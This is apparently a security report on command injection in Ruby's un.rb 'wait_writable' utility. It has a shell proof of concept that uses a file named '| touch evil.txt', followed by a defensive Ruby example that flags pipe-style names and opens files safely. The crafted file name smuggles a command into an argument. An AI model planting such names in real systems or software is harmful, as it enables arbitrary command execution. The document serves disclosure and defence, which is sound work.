Ruby: OS Command Injection in '/lib/un.rb -- Utilities to replace common UNIX commands in Makefiles etc'
If the `wait_writable` command receives a list of files and the name of one of them contains a command, that command will be executed.

PoC

```bash
$ touch \|\ touch\ evil.txt
$ ls
'| touch evil.txt'
$ ruby -run -e wait_writable -- -w 1 -v *
$ ls
evil.txt  '| touch evil.txt'
```

The vulnerability has the same severity as...
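An added example, not taken from the report or from Ruby's `un.rb`: it assumes the file names end up in `Kernel#open`, which in Ruby versions that support pipe-opens runs a string beginning with `|` as a command. `File.open` treats the same name as a literal path. The function names `pipe_style_names`, `writable_now?` and `demo` are hypothetical.

```ruby
require "tmpdir"

# Return the names that Kernel#open would interpret as a command
# (first character is "|") instead of as a path. Useful as a check
# before file names from a directory listing or glob are processed.
def pipe_style_names(names)
  names.select { |n| n.start_with?("|") }
end

# Hardened writability probe: File.open never spawns a subprocess,
# so a name such as "| touch evil.txt" is opened as an ordinary file.
def writable_now?(path)
  File.open(path, "r+b") { true }
rescue SystemCallError
  # Missing file, permission denied, directory, etc.
  false
end

# Constructed scenario mirroring the PoC: a temporary directory that
# contains one file whose name looks like a piped command.
def demo
  Dir.mktmpdir do |dir|
    Dir.chdir(dir) do
      name = "| touch evil.txt"      # constructed sample file name
      File.write(name, "")
      names = Dir.children(".").sort
      {
        flagged:      pipe_style_names(names),
        writable:     writable_now?(name),
        evil_created: File.exist?("evil.txt"),
        listing:      Dir.children(".").sort
      }
    end
  end
end

if $PROGRAM_NAME == __FILE__
  p demo
end
```
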